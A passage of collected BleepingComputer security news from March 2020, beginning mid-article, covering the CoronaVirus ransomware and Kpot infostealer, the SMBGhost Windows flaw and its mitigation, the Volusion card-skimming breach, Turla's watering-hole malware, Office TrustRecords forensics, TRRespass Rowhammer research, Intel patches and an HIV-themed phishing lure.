In October 2019, Microsoft enabled Authenticated Received Chain (ARC) for all for hosted mailboxes to improve anti-spoofing detection and to check authentication results within Office 365. The ARC protocol supplements the DMARC and DKIM email authentication protocols as part of Internet Mail Handlers' effort to combat email spoofing especially when dealing with forwarded messages.

Microsoft also warned Office 365 admins and users against bypassing the built-in spam filters in June 2019, in a support document that also shares guidelines for cases when this can't be avoided.

"If you have to set bypassing, you should do this carefully because Microsoft will honor your configuration request and potentially let harmful messages pass through," the support document says. "Additionally, bypassing should be done only on a temporary basis. This is because spam filters can evolve, and verdicts could improve over time."


New CoronaVirus Ransomware Acts as Cover for Kpot Infostealer
15.3.2020 
Bleepingcomputer  Ransomware

A new ransomware called CoronaVirus has been distributed through a fake web site pretending to promote the system optimization software and utilities from WiseCleaner.

With the increasing fears and anxiety of the Coronavirus (COVID-19) outbreak, an attacker has started to build a campaign to distribute a malware cocktail consisting of the CoronaVirus Ransomware and the Kpot information-stealing Trojan.

This new ransomware was discovered by MalwareHunterTeam and after further digging into the source of the file, we have been able to determine how the threat actor plans on distributing the ransomware and possible clues suggesting that it may actually be a wiper.

CoronaVirus Ransomware spread through fake WiseCleaner site
To distribute the malware, the attackers have created a web site that impersonates the legitimate Windows system utility site WiseCleaner.com.

Fake WiseCleaner Site
Fake WiseCleaner Site
The downloads on this site are not active but have distributed a file called WSHSetup.exe that currently acts as a downloader for both the CoronaVirus Ransomware and a password-stealing Trojan called Kpot.

When the program is executed, it will attempt to download a variety of files from a remote web site. Currently, only the file1.exe and file2.exe are available for download, but you can see that it attempts to download a total of seven files.

Installer downloading malware
Installer downloading malware
The first file downloaded by the installer is 'file1.exe' and is the Kpot password-stealing Trojan.

When executed, it will attempt to steal cookies and login credentials from web browsers, messaging programs, VPNs, FTP, email accounts, gaming accounts such as Steam and Battle.net, and other services. The malware will also take a screenshot of the active desktop and attempt to steal cryptocurrency wallets stored on the infected computer.

This information is then uploaded to a remote site operated by the attackers.

The second file, file2.exe, is the CoronaVirus Ransomware, which will be used to encrypt the files on the computer.

When encrypting files, it will only target files that contain the following extensions:

.bak, .bat, .doc, .jpg, .jpe, .txt, .tex, .dbf, .xls, .cry, .xml, .vsd, .pdf, .csv, .bmp, .tif, .tax, .gif, .gbr, .png, .mdb, .mdf, .sdf, .dwg, .dxf, .dgn, .stl, .gho, .ppt, .acc, .vpd, .odt, .ods, .rar, .zip, .cpp, .pas, .asm, .rtf, .lic, .avi, .mov, .vbs, .erf, .epf, .mxl, .cfu, .mht, .bak, .old
Files that are encrypted will be renamed so that it continues to use the same extension, but the file name will be changed to the attacker's email address. For example, test.jpg would be encrypted and renamed to 'coronaVi2022@protonmail.ch___1.jpg'.

In some cases, like below, it may prepend the email address multiple times to the file name.

CoronaVirus Encrypted Files
CoronaVirus Encrypted Files
In each folder that is encrypted and on the desktop, a ransom note named CoronaVirus.txt will be created that demands 0.008 (~$50) bitcoins to a hardcoded bitcoin address of bc1qkk6nwhsxvtp2akunhkke3tjcy2wv2zkk00xa3j, which has not received any payments as of yet.

CoronaVirus Ransom Note
CoronaVirus Ransom Note
The ransomware will also rename the C: drive to CoronaVirus as shown below, which adds nothing other than the attacker trolling the victims.

Renamed C: Drive to Troll victim
Renamed C: Drive to Troll victim
On reboot, the ransomware will display a lock screen displaying the same text from the ransom note before Windows is loaded as seen below.

CoronaVirus Ransomware MBRLocker component
CoronaVirus Ransomware MBRLocker component
Head of SentinelLabs Vitali Kremez told BleepingComputer that this is being displayed through a modification of the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager "BootExecute" Registry value that launches an executable from the %Temp% folder before loading any Windows services on boot.

Modified BootExecute Key
Modified BootExecute Key
After 45 minutes, the lock screen will switch to a slightly different message. You are still unable to enter any code, though, to get back into the system.

Changed MBRLocker screen
Changed MBRLocker screen
After 15 minutes, it boots back into Windows and upon login will display the CoronaVirus.txt ransom note.

This is a strange ransomware and is still being analyzed for weaknesses.

Based on the low ransom amount, static bitcoin address, and political message, it is strongly suspected that this ransomware is being used more as a cover for the Kpot infection rather than to generate actual ransom payments.

"Donations to the US presidential elections are accepted around the clock."

BleepingComputer's theory is that the ransomware component is being used to distract the user from realizing that the Kpot information-stealing Trojan was also installed to steal passwords, cookies, and cryptocurrency wallets.

Anyone who has been infected with this attack should immediately use another computer to change all of their online passwords as they have now been compromised by the Kpot info-stealer.


Microsoft Releases KB4551762 Security Update for SMBv3 Vulnerability
15.3.2020 
Bleepingcomputer  OS

Microsoft released the KB4551762 security update to patch the pre-auth RCE Windows 10 vulnerability found in Microsoft Server Message Block 3.1.1 (SMBv3), two days after details regarding the flaw were leaked as part of the March 2020 Patch Tuesday.

The KB4551762 security update tracked as CVE-2020-0796 addresses "a network communication protocol issue that provides shared access to files, printers, and serial ports," according to Microsoft.

KB4551762 can be installed by checking for updates via Windows Update or by manually downloading it for your Windows version from the Microsoft Update Catalog.

"While we have not observed an attack exploiting this vulnerability, we recommend that you apply this update to your affected devices with priority," Microsoft says.

The vulnerability, dubbed SMBGhost or EternalDarkness, only impacts devices running Windows 10, version 1903 and 1909, and Windows Server Server Core installations, versions 1903 and 1909.

Microsoft explained that the vulnerability only exists in a new feature added to Windows 10 version 1903 and that older versions of Windows do not offer support for SMBv3.1.1 compression, the feature behind this bug.

Confirmed Microsoft pushing KB4551762 OOB security update out to affected systems through Windows Update
Confirmed Microsoft pushing KB4551762 OOB security update to affected systems via Windows Update
SMBv3 RCE vulnerability
Microsoft shared details on CVE-2020-0796 only after security vendors part of the Microsoft Active Protections Program who got early access to the flaw's details released information during the March 2020 Patch Tuesday.

At the time, Microsoft published an advisory with more info on the leaked bug and mitigation designed to block potential attacks after news of a wormable pre-auth RCE vulnerability affecting SMBv3 spread.

"Microsoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests," the advisory reads. "An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client."

"To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it."

DoS and LPE proof-of-concepts demoed by researchers
Researchers at cybersecurity firm Kryptos Logic discovered 48,000 Windows 10 hosts vulnerable to attacks targeting the CVE-2020-0796 vulnerability and also shared a demo video of a denial-of-service proof-of-concept exploit created by security researcher Marcus Hutchins.

SophosLabs' Offensive Research team also developed and shared a video demo of a local privilege escalation proof-of-concept exploit that allows attackers with low-level privileges to gain SYSTEM-level privileges.

"The SMB bug appears trivial to identify, even without the presence of a patch to analyze," Kryptos Logic said, with malicious actors probably being also close to developing their own exploits for CVE-2020-0796.

For admins who cannot apply the security update at the moment, Microsoft provides mitigation measures for SMB servers and recommends disabling SMBv3 compression using this PowerShell command (no restart required, doesn't prevent SMB clients' exploitation ):

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force
Enterprise customers are also advised to block the TCP port 445 at the enterprise perimeter firewall to prevent attacks on SMB servers attempting to exploit the flaw.

While malicious scans for vulnerable Windows 10 systems haven't been detected so far, attacks targeting unpatched devices are close seeing that PoC exploits have already been developed and that the bug is easy to analyze.


Hackers Get $1.6 Million for Card Data from Breached Online Shops
15.3.2020 
Bleepingcomputer  Incindent

Hackers have collected $1.6 million from selling more than 239,000 payment card records on the dark web. The batch was assembled from thousands of online shops running last year a tainted version of Volusion e-commerce software.

The compromise was discovered in October 2019 by Check Point security researcher Marcel Afrahim and affected stores hosted on the Volusion cloud platform.

Wide-scope operation
This was a web-skimming incident, where attackers use malicious JavaScript that steals payment data when customers provide it at checkout.

In this case, the hackers modified a resource used on Volusion-based stores for navigating the UI menu. This resource loaded the skimmer from an external path.

Evidence found by Trend Micro indicates that the attack started on September 7 and is the work of FIN6.

RiskIQ refers to them as MageCart Group 6 and assesses that it goes only after high-profile targets that ensure a large volume of transactions.

Significant damage
A report from Gemini Advisory today informs that whoever compromised the Volusion infrastructure waited until November 2019 to start selling the data on the dark web.

Until now, they offered more than 239,000 payment card records on a single dark web marketplace and made $1.6 million. This data was from hundreds of different merchants.


Gemini determined that the number of compromised stores is as high as 6,589, which is in line with results from a search for sites with the modified Volusion JavaScript.

The researchers estimate that the attackers have up to 20 million records, though, which may trickle on the dark web for a long time. If true, they could have a potential maximum value of more than $100 million, if prices don’t fall.

“The average CNP [card-not-present] breach affecting small to mid-sized merchants compromises 3,000 records; scaling this figure to the 6,589 merchants using Volusion affected by this breach, the potential number of compromised records is up to nearly 20 million. Given this figure, the maximum profit potential would be as high as $133.89 million USD” - Gemini Advisory

This profit is just an estimation, though. However, even if hackers make just a 10th of it, the figure is still impressive. Buyers also stand to make significant profits from using the stolen card data, Gemini told BleepingComputer.

As for the domains affected by the attack, almost 5,900 were registered in the U.S., with less than 200 registered in Canada.


From the 239,000 records already sold on the dark web, 98.97% are for cards issued in the U.S., the researchers found. The next-largest issuer countries, each of them accounted for just several hundred records.


48K Windows Hosts Vulnerable to SMBGhost CVE-2020-0796 RCE Attacks
15.3.2020 
Bleepingcomputer  Attack

After an Internet-wide scan, researchers at cybersecurity firm Kryptos Logic discovered roughly 48,000 Windows 10 hosts vulnerable to attacks targeting the pre-auth remote code execution CVE-2020-0796 vulnerability found in Microsoft Server Message Block 3.1.1 (SMBv3).

Several vulnerability scanners designed to detect Windows devices exposed to attacks are already available on GitHub, including one created by Danish security researcher ollypwn and designed to check if SMBv3 is enabled on the device and if the compression capability that triggers the bug is enabled.

The vulnerability, dubbed SMBGhost, is known to only impact desktop and server systems running Windows 10, version 1903 and 1909, as well as Server Core installations of Windows Server, versions 1903 and 1909.

Microsoft explains that "the vulnerability exists in a new feature that was added to Windows 10 version 1903" and that "older versions of Windows do not support SMBv3.1.1 compression."

CVE-2020-0796 scanner (server without and with mitigation).png
ollypwn's CVE-2020-0796 scanner in action (server without and with mitigation)
DoS proof-of-concept already demoed
They also shared a demo video of a denial-of-service proof-of-concept exploit developed by researcher Marcus Hutchins (aka MalwareTech).

"The SMB bug appears trivial to identify, even without the presence of a patch to analyze," according to Kryptos Logic which means that malicious actors might soon be able to develop their own CVE-2020-0796 exploits.

While no malicious scans for Windows 10 hosts without mitigations put in place haven't yet been detected, the fact that PoC exploits have already been developed and the bug is so easy to analyze that it could lead to malicious attacks soon.

The CVE-2020-0796 pre-auth RCE vulnerability
Microsoft publicly disclosed details about the SMBGhost vulnerability only after some security vendors part of the Microsoft Active Protections Program who get early access to vulnerability information released information during this month's Patch Tuesday.

After the news of a wormable pre-auth RCE vulnerability affecting SMBv3 spread, Microsoft published a security advisory with info on the leaked bug and mitigation measures designed to block potential attacks.

"Microsoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests," the advisory reads. "An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client."

"To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it."

Microsoft shares mitigation measures for SMB servers
As a workaround until a security update is released, Microsoft's advisory recommends disabling SMBv3 compression using this PowerShell (Admin) command (no reboot required, does not prevent the exploitation of SMB clients):

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force
Additionally, enterprise customers are advised to block the TCP port 445 at the enterprise perimeter firewall to prevent attacks attempting to exploit the flaw.

"This can help protect networks from attacks that originate outside the enterprise perimeter," Redmond explains. "Blocking the affected ports at the enterprise perimeter is the best defense to help avoid Internet-based attacks."

"However, systems could still be vulnerable to attacks from within their enterprise perimeter," Microsoft adds.

We've just finished our first internet wide scan for CVE-2020-0796 and have identified 48000 vulnerable hosts. We'll be loading this data into Telltale for CERTs and organisations to action. We're also working on a blog post with more details (after patch).

— Kryptos Logic (@kryptoslogic) March 12, 2020


Advanced Russian Hackers Use New Malware in Watering Hole Operation
15.3.2020 
Bleepingcomputer  APT

Two previously undocumented pieces of malware, a downloader and a backdoor, were used in a watering hole operation attributed to the Russian-based threat group Turla.

To reach targets of interest, the hackers compromised at least four websites, two of them belonging to the Armenian government. This indicates that the threat actor was after government officials and politicians.

Simple, yet effective trick
The new tools are a .NET malware dropper called NetFlash and a Python-based backdoor named PyFlash. They would be delivered following a fake Adobe Flash update notification received by victims.

At least four Armenian websites were infected by yet unknown means in this campaign, which started since at least the beginning of 2019.

armconsul[.]ru: The consular Section of the Embassy of Armenia in Russia
mnp.nkr[.]am: Ministry of Nature Protection and Natural Resources of the Republic of Artsakh
aiisa[.]am: The Armenian Institute of International and Security Affairs
adgf[.]am: The Armenian Deposit Guarantee Fund
After gaining access to the website, the hackers added a piece of malicious JavaScript code that loaded from the external source ‘skategirlchina[.]com’ a script designed to fingerprint the visitor’s web browsers.

Visitors landing on the compromised website for the first time would get a persistent cookie whose code is publicly available. This is used for tracking future visits to sites compromised for this operation.

Security researchers from ESET believe that Turla (a.k.a. Waterbug, WhiteBear, Venomous Bear, Snake) hackers were very selective about their targets, moving to the next stage of the attack only for a small number of visitors.

In the first stage of the attack, victims would see a fake warning for updating Adobe Flash Player, shown in an iFrame. If the visitor acted on it, they would get a malicious executable that installed both a legitimate copy of Flash and a Turla malware variant, ESET says in a report today.


Starting September 2019, the first stage payload from a backdoor named Skipper to the new NetFlash malware downloader, which appears to have been compiled at the end of August and early September of last year.

It is NetFlash’s job to retrieve the second-stage PyFlash backdoor from a hard-coded URL and to make it persistent on the system via a Windows scheduled task.

ESET created the image below to show how Turla used this watering hole operation to target and compromise systems deemed of interest:


The attackers used the ‘py2exe’ extension to convert their PyFlash script into an executable that runs on Windows without the need of Python.

PyFlash was mainly used to send to the command and control (C2) server information about the victim host. Supported commands are relate to the OS and the network (systeminfo, tasklist, ipconfig, getmac, arp).

The C2 can send additional commands such as for downloading files from a given link, running a Windows command, change the delay time for launching the malware, or removing infection traces by uninstalling the backdoor.

For the last one, confirms the instruction via POST‌ request to the C2 with the following string:

I'm dying :(
Tell my wife that i love her...
Watering hole attacks are a known tactic for Turla but researchers are somewhat surprised that the group used a common trick to deliver their malware. This shows that even sophisticated threat actors can choose a simple solution to achieve their goal.

However, ESET points out that the actor did make an effort to evade detection by using a different payload than Skipper, which was essentially burned from long-time use.


Google Chrome Gets 'Default to Guest' Mode for Stateless Browsing
15.3.2020 
Bleepingcomputer  Security

Google announced today that a new 'Default to Guest mode' feature is now available for Windows, Linux, and macOS power users of the Chrome web browser.

The new Google Chrome feature can be enabled using a command-line switch or an enterprise policy, and it allows users to configure the web browser to always launch into Guest Mode.

In this browsing mode, Chrome will delete all browsing activity from the computer after exiting the browser, providing its users with "a stateless browsing experience from session to session."

Google Chrome Guest mode
Google Chrome Guest mode
'Default to Guest' mode for Chrome
The Guest mode can be used to allow others to use your computer for browsing or for surfing the web on someone else's device without access to any Chrome profiles.

The difference between Guest mode and Incognito mode is that you will still be able to access all the info in your profile while using the latter.

"Pages you view in this window won’t appear in the browser history and they won’t leave other traces, like cookies, on the computer after you close all open Guest windows," Google explains. "Any files you download will be preserved, however."

While browsing the web in Guest mode, Chrome will not save any info on:

Websites you visit, including the ads and resources used on those sites
Websites you sign in to
Your employer, school, or whoever runs the network you’re using
Your internet service provider
Search engines (search engines may show search suggestions based on your location or activity in your current Incognito browsing session.)
Toggling on Chrome's Default to Guest mode
Windows users can enable the new feature by following these steps:

Exit all running instances of Chrome.
Right-click on your "Chrome" shortcut.
Choose properties.
At the end of your "Target:" line add the following: chrome.exe --guest
Once complete, use the shortcut to launch Chrome.
Windows users can also open the Command Prompt or PowerShell app (or any other Terminal program), browse to Google Chrome's folder, and launch the browser with the --guest parameter.

Launching Chrome in Guest Mode from Windows PowerShell
Launching Chrome in Guest Mode from Windows PowerShell
For macOS and Linux users, Google provides this procedure:

Quit all running instances of Chrome.
Run your favorite Terminal application.
In the terminal, find your Chrome application and append --guest as a command-line parameter and hit ENTER to launch Chrome.
To get back to your Chrome profile, users will have to exit all Chrome instances and relaunch the web browser without the --guest command-line switch — Windows users who edited the shortcut will have to change the "Target:" line to its previous contents.


Windows Registry Helps Find Malicious Docs Behind Infections
15.3.2020 
Bleepingcomputer  Spam  Virus

If a Windows computer becomes infected and you are trying to find its source, a good place to check is for malicious Microsoft Office documents that have been allowed to run on the computer.

Ransomware, downloaders, RATs, and info-stealing Trojans are commonly distributed through phishing emails containing Word and Excel documents with malicious macros.

When a user opens one of these documents in Microsoft Office, depending on the protection of the document or if the document contains macros, Office will restrict the functionality of the document unless the user clicks on 'Enable Editing' or 'Enable Content' buttons.

When a user enables a particular feature such as editing or macros, the document will be added as a Trusted Document to the TrustRecords subkey under the following Registry keys depending if it's a Word or Excel document:

HKEY_CURRENT_USER\Software\Microsoft\Office\[office_version]\Word\Security\Trusted Documents\TrustRecords
HKEY_CURRENT_USER\Software\Microsoft\Office\[office_version]\Excel\Security\Trusted Documents\TrustRecords
This allows Microsoft Office to remember the decision a user made and not prompt them again in the future.

This also means that if a user allowed editing or macros in a document by pressing the appropriate button, Office will remember this decision the next time you open the document and not ask again.

The good news is we can use this information to our advantage to find Word and Excel documents with macros that have been enabled on the computer.

Trusting Microsoft Office Documents
To illustrate how a document becomes a Trusted Document, let's walk through the steps of opening an actual Word document with malicious macros that were being distributed in a phishing campaign.

As the ultimate goal for a bad actor is for you to enable macros in the document, they commonly display a message walking the user through clicking on the 'Enable Content' button so that macros will be executed and malware will be installed on the computer.

In this particular example, the malicious document is protected, which means it cannot be edited until a user clicks on the 'Enable Editing' button. Furthermore, if a document is protected a user must Enable Editing before they can get to the prompt to enable macros.

Protected Malicious Word document
Protected Malicious Word document
When a user clicks on 'Enable Editing', the full path to the document will be added as a value under the HKEY_CURRENT_USER\Software\Microsoft\Office\[office_version]\Word\Security\Trusted Documents\TrustRecords key.

This contains individual values for each document that has been trusted in some manner; either the Enable Editing or Enable Content button has been clicked.

TrustRecords Key
TrustRecords Key
A created value's data will consist of a timestamp, some other information, and finish with four bytes that determine what action has been trusted. In this case, we clicked on 'Enable Editing, so the four bytes will be set to 01 00 00 00.

Last four bytes set to 01 00 00 00
Last four bytes set to 01 00 00 00
Now that the document has been enabled for editing, Word will prompt the user if they want to enable macros by clicking on the 'Enable Content' button.

Malicious document prompting to enable macros
Malicious document prompting to enable macros
If a user clicks on the 'Enable Content' button, Office will update the TrustRecord for the document to indicate that macros have been allowed with this document and will always be allowed going forward.

This is done by changing the last four bytes of the document's TrustRecord to FF FF FF 7F as seen below.

Macros are allowed to run in this document
Macros are allowed to run in this document
The use of Trusted Documents does not only apply to Word but also other Office applications. For example, if the user clicks on Enable Editing or Enable Content in an Excel spreadsheet, a TrustRecord will be created under the HKEY_CURRENT_USER\Software\Microsoft\Office\[office_version]\Excel\Security\Trusted Documents\TrustRecords Registry key as shown below.

Excel Trust Records
Excel Trust Records
Putting it all together
Now we know that every time a user clicks on 'Enable Editing; or 'Enable Content', Microsoft Office will add the path to the document as a Registry value under the program's TrustRecords key.

We also know that if the last four bytes of the trusted document's value data is set to FF FF FF 7F it means that the user enabled macros in the document, which is a very common vector for a computer to become infected.

Using this information, we can check for potential malicious documents whose macros have been enabled by checking the values under the following keys and then collecting the documents for further forensics.

HKEY_CURRENT_USER\Software\Microsoft\Office\[office_version]\Word\Security\Trusted Documents\TrustRecords
HKEY_CURRENT_USER\Software\Microsoft\Office\[office_version]\Excel\Security\Trusted Documents\TrustRecords
This method is especially useful for tracking down Emotet, TrickBot, Ransomware, or RAT infections.

Clearing Trusted Documents
As TrustRecords remember a user's action's forever and would allow macros to run automatically on a previously enabled document, it is best if the Trusted Documents are removed from the Registry at regular intervals.

This can be done through login scripts, scheduled tasks, or other methods.

Users can also clear their Trusted Documents through the Microsoft Office Trust Center, which can be accessed by performing the following steps:

From within Word or Excel, click on File and then Options.
Under Trust Center, click on the Trust Center Settings button.
Opening the Trust Center
Opening the Trust Center
When the Trust Center opens, click on the Trusted Documents section in the left column.
In the Trusted Documents section, click the Clear button and all of the Trusted Documents will be cleared. This also means that if you open a previously trusted document, Word or Excel will prompt you to 'Enable Editing' or 'Enable Content' again.
Clear Trusted Documents
Clear Trusted Documents
Repeat this same process in your other Office applications.
Close the Trust Center.


DDR4 Memory Still At Rowhammer Risk, New Method Bypasses Fixes
15.3.2020 
Bleepingcomputer  Attack

Academic researchers testing modern memory modules from Samsung, Micron, and Hynix discovered that current protections against Rowhammer attacks are insufficient.

Current mitigation solutions are efficient against known Rowhammer variants but attack possibilities are not exhausted and exploitation is still possible.

The new findings show that memory bit flipping works on many devices, including popular smartphones from Google, Samsung, and OnePlus.

Rowhammer risk lingers on
The attack works by taking advantage of the close proximity of memory cells available in a dynamic random access memory (DRAM).

By hammering one row with sufficient read-write operations, the value of the nearby data bits can change from one to zero and vice-versa (bit flipping). Current variants of the attack access two memory rows (called aggressors), at most.

This modification can lead to a denial-of-service condition, increased privileges on the machine, or it can even allow hijacking the system.

Rowhammer attacks have been demonstrated over time by compromising the Linux kernel, breaking cloud isolation, rooting mobile devices, taking control of web browsers, targeting server applications over the network, or extracting sensitive info stored in RAM.

The best defense to date is commonly referred to as Target Row Refresh (TRR) and it is supposed to eradicate the risk of Rowhammer attacks.

But there is little information about TRR, how it works, and how it is deployed by each vendor/manufacturer - because they need to protect proprietary technology.

Contrary to common belief, TRR is not a single mitigation mechanism, say researchers from VUSec (Systems and Network Security Group at VU Amsterdam).

It is an umbrella term that defines multiple solutions at various levels of the hardware stack and manufacturers took different routes to obtain the same result.

VUSec tested against all known Rowhammer variants a batch of 42 DDR4 modules that had TRR enabled and found that no bit flipping occurred, showing that the defenses were effective for the known attacks.


VUSec found that there are multiple implementations for TRR in DRAM chips from various vendors and that vulnerable cells are not distributed in the same way for every chip.

TRRespass - the Rowfuzzer
With help from researchers at ETH Zurich, who provided SoftMC (an FPGA-based infrastructure), VUSec was able to experiment with DRAM chips and understand the internal operations.

This showed them that it is easy to flip the bits after understanding how the mitigation works. Also, they noticed that the vulnerability is worse on DDR4 chips than on DDR3 because of the difference in tolerated row activation counts, which is higher for the latter.

They found that current TRR implementations track a limited number of aggressor rows hammered by the attacker, two being the most used in currently demonstrated attacks.

"The mitigation clearly cannot keep the information about all accessed rows at the same time, since it would require an unaffordable amount of additional memory nor can it refresh all the victims" - VUSec

So they tried using more aggressor rows. With the newly-gained insight from experimenting with SoftMC, VUSec created a fuzzing tool they named TRResspass, "to identify TRR-aware RowHammer access patterns on modern systems."

"While fuzzing is a common technique in software testing, we implemented the first fuzzer aimed at triggering Rowhammer corruptions in DRAM" - VUSec

TRResspass is open source and works by repeatedly selecting random rows at various locations in DRAM. Starting from the initial hammering patterns produced by TRResspass, the researchers developed a broader class, which they call "Many-sided Rowhammer."


In a paper describing their research and results, VUSec says that their fuzzer recovered effective access patterns for 13 of the 42 memory modules they tested with the TRR protection enabled.

They emphasized that all the modules where TRResspass induced bit flips are vulnerable to at least two hammering patterns. Also, the patterns vary from one module to another.

Getting the fuzzer to work on low-power DDR4 modules in 13 smartphones, allowed it to successfully find Rowhammer patterns that induced bit flips in 5 models: Google Pixel, Google Pixel 3, LG G7 ThinQ, OnePlus 7, and Samsung Galaxy S10e (G970F/DS).


Exploiting the vulnerability with the more sophisticated patterns yielded impressive results, despite not tweaking the attacks for increased efficiency.

The worst time needed to obtain kernel privileges was three hours and 15 minutes, while the best was 2.3 seconds.

They were able to forge a signature from a trusted RSA-2048 key in up to 39 minutes (on other chips this was possible in a little over a minute).

Bypassing sudo permission checks was possible with just one memory module and took around 54 minutes of hammering.


VUSec published the research paper "TRRespass: Exploiting the Many Sides of Target Row Refresh" that provides extensive details about their findings and results achieved with TRResspass.

They disclosed the new type of Rowhammer attacks to all affected parties in November 2019 but new mitigations are not easy to implement and will take some time to deploy. The new method is now tracked as CVE2020-10255.

A statement from Intel says that VUSec's does not show a vulnerability in Intel CPUs and recommends contacting the memory chip supplier for appropriate mitigations.

"Enabling Error Correcting Code (ECC) and/or utilizing memory refresh rates greater than 1X can reduce susceptibility to this and other potential Rowhammer-style attacks" - Intel

Citing previous research (1, 2, 3), VUSec says that there are no reliable solutions older hardware against Rowhammer, and that "stopgap solutions such as using ECC and doubling (or even quadrupling) the refresh rate have proven ineffective." They showed in research published last year that ECC has its limitatations against this type of attack.

AMD also issued a statement, saying that their "microprocessor products include memory controllers designed to meet industry-standard DDR specifications."


Intel Patches High Severity Flaws in Windows Graphics Drivers
15.3.2020 
Bleepingcomputer  Vulnerebility

Intel released security updates to address 27 vulnerabilities as part of March 2020 Patch Tuesday, with ten of them being high severity security flaws impacting Intel's Graphics Drivers for Windows and the Smart Sound Technology integrated audio DSP in Intel Core and Intel Atom CPUs.

The security issues patched today are detailed in the nine security advisories published by Intel on its Security Center, with the company providing download links for security updates available through the drivers and software download center.

The vulnerabilities disclosed today may allow authenticated or privileged users to potentially access sensitive information, to trigger denial-of-service states, and escalate privileges via local access.

Some of the advisories feature a detailed list of all affected products, recommendations for vulnerable products, as well as contact details for users and researchers who want to report other security flaws found in Intel branded software or hardware products.

Full list of March 2020 Patch Tuesday advisories
A list of all security advisories issued by Intel during this month's Patch Tuesday is available below, ordered by highest CVSS score rating to help prioritize patch deployment.

Advisory ID Title CVSS Score Range Severity rating
INTEL-SA-00354 Intel® Smart Sound Technology Advisory 8.6 HIGH
INTEL-SA-00315 Intel® Graphics Driver Advisory 3.2 – 8.4 HIGH
INTEL-SA-00352 BlueZ Advisory 7.1 HIGH
INTEL-SA-00343 Intel® NUC™ Firmware Advisory 7.7 - 7.8 HIGH
INTEL-SA-00349 Intel® MAX® 10 FPGA Advisory 6.1 MEDIUM
INTEL-SA-00319 Intel® FPGA Programmable Acceleration Card N3000 Advisory 4.4 – 6 MEDIUM
INTEL-SA-00330 Snoop Assisted L1D Sampling Advisory 5.6 MEDIUM
INTEL-SA-00334 Intel® Processors Load Value Injection Advisory 5.6 MEDIUM
INTEL-SA-00326 Intel® Optane™ DC Persistent Memory Module Management Software Advisory 4.4 MEDIUM
New Spectre-type data injection vulnerability
As part of this month's Patch Tuesday, Intel also addressed a vulnerability (CVE-2020-0551) disclosed by researchers yesterday and allowing for a novel class of attack techniques against modern Intel processors that can help attackers inject malicious data into apps via transient-execution attacks and steal sensitive data.

According to the researchers who discovered and reported the new vulnerability dubbed LVI (short for Load Value Injection), it bypasses all transient-execution attack mitigations developed for Intel's processors so far, like Meltdown, Spectre, Foreshadow, ZombieLoad, RIDL, and Fallout.

"Load value injection in some Intel processors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side-channel with local access," Intel's security advisory explains.

LVI impacts Intel Skylake Core-family processors and newer, with a list with all affected CPUs being provided by Intel here.

Icelake Core-family processors aren't affected by LVI the researchers say, while Meltdown-resistant processors are "only potentially vulnerable to LVI-zero-data (aka loads exhibiting zero injection behavior only)."

A video showcasing two LVI (Load Value Injection) proof of concept demo attacks against vulnerable Intel platforms is embedded below.

"Due to the numerous complex requirements that must be satisfied to successfully carry out the LVI method, Intel does not believe LVI is a practical exploit in real-world environments where the OS and VMM are trusted," Intel Director of Communications Jerry Bryant said.

"New mitigation guidance and tools for LVI are available now. These work in conjunction with previously released mitigations to substantively reduce the overall attack surface associated with speculative execution side channels."

Intel released updates to the SGX Platform Software (PSW) and SDK to mitigate potential exploits of Load Value Injection (LVI) on platforms and apps using Intel SGX, with impacted system users having to install the latest Intel SGX PSW 2.7.100.2 or above for Windows and 2.9.100.2 or above for Linux.

An academic research paper with more technical information on LVI attacks is available here in PDF format and Intel's white paper can be found here.


Nasty Phishing Scam Pretends to Be Your HIV Test Results
14.3.2020 
Bleepingcomputer 

A new phishing scam is pretending to be your HIV test results to make you more likely to open up a malicious Excel document and become infected.

Over the past year, phishing campaigns have been getting nastier and nastier with scammers coming up with wild stories to get you to open a malicious document or click a link.

In what could be a new low, Proofpoint researchers have found scammers sending phishing emails with malicious Excel spreadsheets that pretend to be your HIV test results from Vanderbilt University.

Fake HIV Test Results
Fake HIV Test Results
While the scammers mess up and misspell 'Vanderbit University', unless you pay close attention you can easily miss the spelling mistake.

Attached to these emails is an attachment named TestResults.xlsb that when opened will state that your data is protected and that you need to 'Enable Content' to view the document.

Malicious Excel Spreadsheet
Malicious Excel Spreadsheet
Once you enable content, though, malicious macros will be executed that downloads and installs the Koadic penetration test and post-exploitation toolkit.

Using Koadic, the attackers gain complete control over the infected computer and can execute any command they wish, such as downloading further malware or stealing files.

"In recent years it has been used by a variety of nation state actors, including both Chinese and Russian state-sponsored groups, as well as attackers associated with Iran," Proofpoint explained in their report.

It is important to remember that medical institutions will never send medical results via ordinary email and will instead have you log in to a secure portal to view results.

"This latest campaign serves as a reminder that health-related lures didn’t start and won’t stop with the recent Coronavirus-themed lures we observed. They are a constant tactic as attackers recognize the utility of the health-related “scare factor.” We encourage users to treat health-related emails with caution, especially those that claim to have sensitive health-related information. Sensitive health-related information is typically safely transmitted using secured messaging portals, over the phone, or in-person," Proofpoint reiterated.

It is also important to never open attachments from strangers or organizations when they were unexpected. Even if the user is familiar, it is better to confirm they sent the email with a phone call or in-person than to open a potentially malicious document.


Microsoft March 2020 Patch Tuesday Fixes 115 Vulnerabilities
14.3.2020 
Bleepingcomputer  OS

Today is Microsoft's March 2020 Patch Tuesday and is always stressful for your Windows administrators, so be especially nice to them today.

With the release of the March 2020 security updates, Microsoft has released fixes for 115 vulnerabilities in Microsoft products. Of these vulnerabilities, 24 are classified as Critical, 88 as Important, and 3 as Moderate.

